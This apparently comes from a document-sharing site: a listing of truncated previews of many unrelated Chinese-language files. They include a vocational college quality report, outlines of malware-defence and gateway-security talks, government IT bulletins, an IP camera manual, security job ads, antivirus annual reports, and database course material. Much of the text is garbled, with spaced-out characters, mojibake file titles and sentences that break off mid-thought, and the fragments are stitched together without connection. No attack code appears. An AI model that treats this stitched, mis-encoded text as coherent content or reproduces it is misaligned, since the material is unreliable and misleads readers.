大连软~1 大 连 软 件 职 业 学 院 高 等 职 业 教 育 质 量 年 度 报 告 ( ) 二 〇 一 六 年 一 月 ( 二 学 2...4 大 连 软 件 职 业 学 院 高 等 职 业 教 育 质 量 报 告 (2015)...4 目 录 一 学 院 基 本 情 况 二 办 学 基 本 信...8...6...7 息 ( 一 ) 明 确 办 学 思 路, 科 学 谋 划 发 展 战 略 ( 二 )

More information

Trend Micro

Trend Micro 資 訊 安 全 - 惡 意 軟 體 的 深 度 防 禦 胡 瑞 宸 大 綱 資 訊 安 全 概 念 現 在 流 行 什 麼? 病 毒 清 除 與 分 析 建 議 程 序 正 確 有 效 的 防 護 觀 念 Free Tool ( 免 費 工 具 ) Cloud technology ( 雲 端 技 術 ) 惡 意 程 式 威 脅 管 理 資 訊 安 全 概 念 資 訊 安 全 概 念 沒 有 任 何

More information

閘道防禦 如何安全地開放內部資源予遠端用戶 如何快速建置閘道防禦工事,增強上網安全

閘道防禦 如何安全地開放內部資源予遠端用戶 如何快速建置閘道防禦工事,增強上網安全 閘 道 防 禦 如 何 安 全 地 開 放 內 部 資 源 予 遠 端 用 戶 如 何 快 速 建 置 閘 道 防 禦 工 事, 增 強 上 網 安 全 台 灣 微 軟 特 約 講 師 顧 新 貽 George Ku 邁 格 行 動 有 限 公 司 大 綱 - I 如 何 安 全 地 開 放 內 部 資 源 予 遠 端 用 戶 遠 端 存 取 的 安 全 需 求 Microsoft IAG 的 遠

More information

Microsoft Word - ¸ê°T³q³ø281´Á.doc

Microsoft Word - ¸ê°T³q³ø281´Á.doc 2 8 1 00 3 76 1 1 13 17 18 21 4893 www.dgbas.gov.tw 政 府 機 關 資 訊 通 報 出 版 機 關 : 行 政 院 主 計 處 電 子 處 理 資 料 中 心 10065 臺 北 市 廣 州 街 2 號 洽 詢 電 話 :(02)23803876 傳 真 :(02)23803974 www.dgbas.gov.tw/imc62 行 政 院 新 聞

More information

Microsoft Word - ¸ê°T³q³ø273´Á.doc

Microsoft Word - ¸ê°T³q³ø273´Á.doc 機 關 動 態 研 究 發 展 考 核 委 員 會 研 考 會 資 訊 管 理 處 林 輝 誼 高 級 分 析 師 自 6 月 2 日 起 退 休, 蔡 世 田 科 長 於 6 月 1 日 升 任 為 高 級 分 析 師 臺 北 市 政 府 臺 北 市 政 府 資 訊 處 系 統 發 展 組 原 由 該 處 設 備 網 路 組 黃 組 長 坤 煌 兼 任, 自 6 月 14 日 起 職 務 由 行

More information

結合IC卡之校園安全網頁系統的設計與實現

結合IC卡之校園安全網頁系統的設計與實現 IC 立 立 路 料 料 (Secure Campus-wide Website System) 料 料 來 理 IC 識 料 不 漏 料 料 兩 零 Windows 便 更 類 IC 讀 RSA AES 料 IC WWW AES RSA PHP 1. 例 1 利 漏洞 易 易 料 都 理 易 不 類 路 數 (World Wide Web, WWW) Web-based 率 來 易 路 利 料 離

More information

專業式報告

專業式報告 IP Kamera 9060A-SL IP Kamera 9060A-SL : V1.00 : 2006.04 IP KAMERA 9000(A) 說 FCC CE 1.IP Kamera 9060A-SL 2.IP Kemera 9060A-SL 3. 4. 9060A-SL 5. 9060A-SL - 1 - 1....3... 2....4 9060A-SL...... 3....5 4....6......

More information

CU0594.pdf

CU0594.pdf 8 SOHO 1 3 003 SOHO SOHO Coder Programmer HTML CSS PHP JavaScrip 009 LECTURE 1-1 1 048 PART 2 LECTURE 1-1 1 049 SOHO Landing Page Landing 050 PART 2 LECTURE 1-1 1 SEO SEO P.093 SEO SEO SEO SEO SEO 051

More information

F4

F4 DOI:10.3969/j.issn.1009-6868.2016.01.002 网 络 出 版 地 址 :http://www.cnki.net/kcms/detail/34.1228.tn.20151117.1506.006.html Challenges and Countermeasures of Network Space Security 周 延 森 /ZHOU Yansen 周 琳 娜

More information

24 第 3 章 创 建 Access 数 据 库 和 表 3.1 创 建 Access 数 据 库 Access 2003 中 的 数 据 库 属 于 关 系 型 数 据 库, 以.mdb 为 文 件 的 后 缀, 建 立 一 个 数 据 库 的 同 时, 就 创 建 了 数 据 库 中 的 对

24 第 3 章 创 建 Access 数 据 库 和 表 3.1 创 建 Access 数 据 库 Access 2003 中 的 数 据 库 属 于 关 系 型 数 据 库, 以.mdb 为 文 件 的 后 缀, 建 立 一 个 数 据 库 的 同 时, 就 创 建 了 数 据 库 中 的 对 第 3 章 创 建 Access 数 据 库 和 表 在 Access 中, 数 据 库 是 一 个 存 储 数 据 库 应 用 系 统 中 各 对 象 的 容 器,Access 可 以 通 过 一 个 数 据 库 文 件 来 管 理 所 有 的 数 据 库 资 源 Access 2003 数 据 库 是 所 有 表 查 询 窗 体 报 表 宏 模 块 和 页 等 对 象 的 集 合 其 中, 表

More information

計畫書封面範例

計畫書封面範例 致 理 技 術 學 院 資 訊 管 理 系 專 題 期 末 報 告 書 藝 網 情 深 學 生 : 陳 暐 儒 (19810202) 陳 志 蒂 (19810138) 李 翊 菡 (19810117) 陳 志 萱 (19810237) 林 宛 柔 (19810218) 胡 肇 群 (19810213) 本 成 果 報 告 書 經 審 查 及 口 試 合 格 特 此 證 明 指 導 老 師 : 中 華

More information

职 位 类 别 : 测 试 工 程 师 工 作 经 验 或 实 习 经 历 : 不 限 岗 位 要 求 : 1. 本 科 及 其 以 上 学 历, 计 算 机 相 关 专 业 2014 届 毕 业 生 ; 2. 实 习 时 间 要 求, 尽 量 一 周 五 个 工 作 日 ; 3. 熟 悉 Wind

职 位 类 别 : 测 试 工 程 师 工 作 经 验 或 实 习 经 历 : 不 限 岗 位 要 求 : 1. 本 科 及 其 以 上 学 历, 计 算 机 相 关 专 业 2014 届 毕 业 生 ; 2. 实 习 时 间 要 求, 尽 量 一 周 五 个 工 作 日 ; 3. 熟 悉 Wind 企 业 信 息 表 公 司 名 称 : 中 铁 信 安 ( 北 京 ) 信 息 安 全 技 术 有 限 公 司 公 司 性 质 : 国 企 控 股 公 司 规 模 : 100 人 左 右 所 属 行 业 : 互 联 网 计 算 机 软 件 招 聘 人 数 :12 工 作 地 点 : 北 京 市 海 淀 区 公 司 能 够 提 供 的 福 利 : 五 险 一 金 晋 升 旅 游 节 假 日 礼 物 加

More information

1 产 品 简 介... - 1-1.1 特 性... - 1-1.2 包 装... - 1-1.3 产 品 外 观... - 2-1.4 电 脑 系 统 要 求... - 3-1.5 硬 件 安 装... - 3-1.6 软 件 安 装... - 4-2 软 件 操 作... - 6-2.1 IP

1 产 品 简 介... - 1-1.1 特 性... - 1-1.2 包 装... - 1-1.3 产 品 外 观... - 2-1.4 电 脑 系 统 要 求... - 3-1.5 硬 件 安 装... - 3-1.6 软 件 安 装... - 4-2 软 件 操 作... - 6-2.1 IP 无 线 / 有 线 网 络 摄 像 机 使 用 说 明 书 黑 色 白 色 深 圳 市 富 泓 电 子 有 限 公 司 电 话 : +86-755-26509025 传 真 : +86-755-26509229 1 产 品 简 介... - 1-1.1 特 性... - 1-1.2 包 装... - 1-1.3 产 品 外 观... - 2-1.4 电 脑 系 统 要 求... - 3-1.5 硬

More information

研 究 部 总 知 道 创 宇 做 这 些 事 : Web 安 全 产 品 的 核 心 技 术 研 发 Web/Web2.0 安 全 研 究 让 互 联 网 更 好 更 安 全 团 队 做 这 些 事 : Web Hacking, 分 享 在 :xeyeteam.apps

研 究 部 总 知 道 创 宇 做 这 些 事 : Web 安 全 产 品 的 核 心 技 术 研 发 Web/Web2.0 安 全 研 究 让 互 联 网 更 好 更 安 全 团 队 做 这 些 事 : Web Hacking, 分 享 在 :xeyeteam.apps # Author: 余 弦 # Date: 2011/08/10 # Email: evilcos@gmail.com 研 究 部 总 监 @ 知 道 创 宇 做 这 些 事 : Web 安 全 产 品 的 核 心 技 术 研 发 Web/Web2.0 安 全 研 究 让 互 联 网 更 好 更 安 全 ROOT@XEYE 团 队 做 这 些 事 : Web Hacking, 分 享 在 :xeyeteam.appspot.com

More information

Microsoft Word - 100118002.htm

Microsoft Word - 100118002.htm 100 年 度 11800 電 腦 軟 體 應 用 乙 級 技 術 士 技 能 檢 定 學 科 測 試 試 題 本 試 卷 有 選 擇 題 80 題, 每 題 1.25 分, 皆 為 單 選 選 擇 題, 測 試 時 間 為 100 分 鐘, 請 在 答 案 卡 上 作 答, 答 錯 不 倒 扣 ; 未 作 答 者, 不 予 計 分 准 考 證 號 碼 : 姓 名 : 選 擇 題 : 1. (3)

More information

掘 金 安 全 数 据 腾 讯 安 全 数 据 运 营 实 践 江 虎 (xti9er) 2014.11

掘 金 安 全 数 据 腾 讯 安 全 数 据 运 营 实 践 江 虎 (xti9er) 2014.11 掘 金 安 全 数 据 腾 讯 安 全 数 据 运 营 实 践 江 虎 (xti9er) 2014.11 Who am i 江 虎 xti9er 10 多 年 安 全 研 究 与 从 业 经 验 10 年 加 入 腾 讯 入 侵 检 测 体 系 建 设 应 急 响 应 安 全 培 训 入 侵 对 抗 团 队 掘 金 安 全 数 据 安 全 工 作 的 困 境 历 史 案 例 的 启 示 榨 取 数

More information

User Group SMTP

User Group SMTP SOP v1.00 2003 02 28 TrendMicro Control Manager V2.5 1 1... 3 2... 4 2.1... 4 2.2... 14 3... 24 3.1... 24 3.2... 29 3.3... 34 3.3.1... 34 3.3.2 User Group... 37 3.3.3... 40 3.4... 41 3.4.1... 41 3.4.2

More information

改 善 動 機 很 多 人 在 使 用 學 校 網 站 時, 感 覺 到 有 諸 多 不 便, 像 是 雖 然 學 校 有 辦 活 動, 但 很 難 發 現 公 佈 在 網 站 上 的 活 動 資 訊, 還 有 雲 端 系 統 銷 曠 繁 複 等, 鑒 於 以 上 原 因, 我 們 決 定 改 善

改 善 動 機 很 多 人 在 使 用 學 校 網 站 時, 感 覺 到 有 諸 多 不 便, 像 是 雖 然 學 校 有 辦 活 動, 但 很 難 發 現 公 佈 在 網 站 上 的 活 動 資 訊, 還 有 雲 端 系 統 銷 曠 繁 複 等, 鑒 於 以 上 原 因, 我 們 決 定 改 善 創 意 思 考 期 末 報 告 改 善 學 校 網 頁 指 導 老 師 : 蔡 璞 吳 俊 儀 組 員 :49946202 王 鈺 婷 49946215 林 曉 涵 49946233 黃 妍 慈 改 善 動 機 很 多 人 在 使 用 學 校 網 站 時, 感 覺 到 有 諸 多 不 便, 像 是 雖 然 學 校 有 辦 活 動, 但 很 難 發 現 公 佈 在 網 站 上 的 活 動 資 訊, 還

More information

CA Nimsoft Monitor Snap 快速入门指南

CA Nimsoft Monitor Snap 快速入门指南 CA Nimsoft Monitor Snap 快 速 入 门 指 南 7.0 法 律 声 明 版 权 所 有 2013,CA 保 留 所 有 权 利 保 证 本 文 档 中 包 含 的 资 料 按 照 现 状 提 供, 将 来 版 本 中 如 有 更 改, 恕 不 另 行 通 知 另 外, 在 适 用 法 律 允 许 的 最 大 范 围 内,Nimsoft LLC 不 承 担 关 于 本 手 册

More information

目錄

目錄 資 訊 素 養 線 上 教 材 單 元 五 資 料 庫 概 論 及 Access 5.1 資 料 庫 概 論 5.1.1 為 什 麼 需 要 資 料 庫? 日 常 生 活 裡 我 們 常 常 需 要 記 錄 一 些 事 物, 以 便 有 朝 一 日 所 記 錄 的 事 物 能 夠 派 得 上 用 場 我 們 能 藉 由 記 錄 每 天 的 生 活 開 銷, 就 可 以 在 每 個 月 的 月 底 知

More information

Microsoft Word - 13院21号.doc

Microsoft Word - 13院21号.doc 川 教 考 院 2013 21 号 四 川 省 教 育 考 试 院 关 于 全 国 计 算 机 等 级 考 试 体 系 调 整 的 通 知 各 NCRE 考 点 : 为 进 一 步 适 应 新 时 期 计 算 机 应 用 技 术 的 发 展 和 人 才 市 场 需 求 的 变 化, 确 保 全 国 计 算 机 等 级 考 试 ( 以 下 简 称 NCRE) 健 康 持 续 发 展, 教 育 部 考

More information

免 责 声 明 本 报 告 综 合 瑞 星 云 安 全 系 统 瑞 星 客 户 服 务 中 心 瑞 星 反 病 毒 实 验 室 瑞 星 互 联 网 攻 防 实 验 室 瑞 星 威 胁 情 报 平 台 等 部 门 的 统 计 研 究 数 据 和 分 析 资 料, 仅 针 对 中 国 2016 年 1

免 责 声 明 本 报 告 综 合 瑞 星 云 安 全 系 统 瑞 星 客 户 服 务 中 心 瑞 星 反 病 毒 实 验 室 瑞 星 互 联 网 攻 防 实 验 室 瑞 星 威 胁 情 报 平 台 等 部 门 的 统 计 研 究 数 据 和 分 析 资 料, 仅 针 对 中 国 2016 年 1 瑞 星 2016 年 上 半 年 中 国 信 息 安 全 报 告 北 京 瑞 星 信 息 技 术 股 份 有 限 公 司 2016 年 7 月 免 责 声 明 本 报 告 综 合 瑞 星 云 安 全 系 统 瑞 星 客 户 服 务 中 心 瑞 星 反 病 毒 实 验 室 瑞 星 互 联 网 攻 防 实 验 室 瑞 星 威 胁 情 报 平 台 等 部 门 的 统 计 研 究 数 据 和 分 析 资 料,

More information

LiveBOS产品白皮书

LiveBOS产品白皮书 面 向 对 象 的 业 务 支 撑 平 台 与 建 模 工 具 * 实 现 应 您 所 需, 随 时 而 变 的 应 用 * 业 务 管 理 应 用 软 件 最 佳 选 择 * LiveBOS 产 品 白 皮 书 LiveBOS 产 品 白 皮 书 福 州 顶 点 信 息 管 理 有 限 公 司 http://www.apexinfo.com.cn Copyright c 2008-2015 版 权

More information

简 历 基 本 信 息 姓 名 : 周 汤 性 别 : 男 出 生 日 期 : 1981 年 09 月 19 日 居 住 地 : 广 州 市 工 作 年 限 : 五 年 以 上 户 口 : 江 西 目 前 年 薪 : 10-15 万 人 民 币 地 址 : 广 东 广 州 天 河 北 路 邮 编 : 510000 电 子 邮 件 : admin.net@163.com 移 动 电 话 : 086-13560110611

More information

安徽省教育招生考试院

安徽省教育招生考试院 安 徽 省 教 育 招 生 考 试 院 皖 招 考 函 2012 245 号 关 亍 做 好 2013 年 上 半 年 全 国 计 算 机 等 级 考 试 考 务 工 作 的 通 知 各 市 教 育 考 试 机 构, 各 考 点 : 根 据 教 育 部 考 试 中 心 关 亍 2013 年 上 半 年 全 国 计 算 机 等 级 考 试 有 关 事 宜 的 通 知 ( 教 试 中 心 函 2012

More information

LiveBOS产品白皮书

LiveBOS产品白皮书 面 向 对 象 的 业 务 支 撑 平 台 与 建 模 工 具 * 实 现 应 您 所 需, 随 时 而 变 的 应 用 * 业 务 管 理 应 用 软 件 最 佳 选 择 * LiveBOS 产 品 白 皮 书 LiveBOS 产 品 白 皮 书 福 建 顶 点 软 件 股 份 有 限 公 司 www.livebos.com Copyright c 1996-2009 版 权 所 有 福 建 顶

More information

摘 要 本 研 究 主 要 目 的 在 於 提 出 E 化 網 路 評 量 系 統 的 設 計, 並 從 事 上 述 系 統 的 建 置 工 作 為 驗 證 系 統 之 可 行 性, 以 國 小 五 年 級 自 然 與 生 活 科 技 科 為 範 例 給 學 生 和 老 師 進 行 試 用 除 進

摘 要 本 研 究 主 要 目 的 在 於 提 出 E 化 網 路 評 量 系 統 的 設 計, 並 從 事 上 述 系 統 的 建 置 工 作 為 驗 證 系 統 之 可 行 性, 以 國 小 五 年 級 自 然 與 生 活 科 技 科 為 範 例 給 學 生 和 老 師 進 行 試 用 除 進 國 立 台 中 師 範 學 院 教 育 測 驗 統 計 研 究 所 理 學 碩 士 論 文 指 導 教 授 : 鄭 富 森 博 士 E 化 網 路 評 量 系 統 - 以 國 小 五 年 級 自 然 與 生 活 科 技 為 例 研 究 生 : 陳 國 男 撰 中 華 民 國 九 十 四 年 六 月 I 摘 要 本 研 究 主 要 目 的 在 於 提 出 E 化 網 路 評 量 系 統 的 設 計,

More information

TopTest_Adminstrator.doc

TopTest_Adminstrator.doc 壹 前 言... 3 貳 系 統 簡 介... 4 一 TKB multimedia Top-Test 系 統 架 構...4 1. 使 用 者 介 面 層 (Presentation tier)...5 2. 商 業 邏 輯 層 (business logic tier)...5 3. 資 料 服 務 層 (data services tier)...5 二 TKB Multimedia Top-Test

More information

RG-NBS5816XS交换机RGOS 10.4(3)版本WEB管理手册

RG-NBS5816XS交换机RGOS 10.4(3)版本WEB管理手册 Web 配 置 手 册 NBS 5816XS 交 换 机 RGOS 10.4(3) 文 档 版 本 号 :V1.0 技 术 支 持 4008-111-000 http://webchat.ruijie.com.cn 版 权 声 明 福 建 星 网 锐 捷 网 络 有 限 公 司 2015 锐 捷 网 络 有 限 公 司 版 权 所 有, 并 保 留 对 本 手 册 及 本 声 明 的 一 切 权 利

More information

测试员第十期.doc

测试员第十期.doc THE SOFTEWARE TESTING ENGINEERING MAGAZINE No.10 2005.12 普 及 & 共 享 & 交 流 & 提 高 本 期 导 读 网 站 测 试 技 术 简 介. 在 一 个 软 件 项 目 开 发 中, 系 统 测 试 是 保 证 整 体 项 目 质 量 的 重 要 一 环, 本 文 将 就 网 站 的 测 试 技 术 及 相 应 的 自 动 测 试 工

More information

x 前言 Python Python ETL extract transform load Python Python / Python Python Python

x 前言 Python Python ETL extract transform load Python Python / Python Python Python 1 Python CSV Excel Python Python tab https:// github.com/cbrownley/foundations-for-analytics-with-python x 前言 Python Python ETL extract transform load Python Python / Python Python Python 前言 xi CSV Excel

More information

iGENUS爱琴思邮件系统技术白皮书

iGENUS爱琴思邮件系统技术白皮书 igenus 爱 琴 思 邮 件 系 统 技 术 白 皮 书 Http://www.iGENUS.cn 版 权 信 息 igenus 爱 琴 思 邮 件 系 统 版 权 所 有 2009 爱 琴 思 科 技 ( 成 都 ) 有 限 公 司 igenus information technologies Inc.,Chengdu 文 档 保 证 声 明 本 文 档 以 提 供 信 息 为 目 的, 所

More information

页眉

页眉 课 程 设 计 2016 年 第 9 期 高 职 院 校 底 层 共 享 中 层 分 立 高 层 互 选 专 业 群 课 程 体 系 的 探 讨 和 实 践 鲁 娟 娟, 王 俊, 王 高 山, 吕 树 红 摘 要 : 专 业 群 建 设 是 一 个 系 统 工 程, 涉 及 人 才 培 养 模 式 课 程 体 系 教 学 团 队 实 训 体 系 教 学 资 源 库 质 量 保 障 与 监 督 机

More information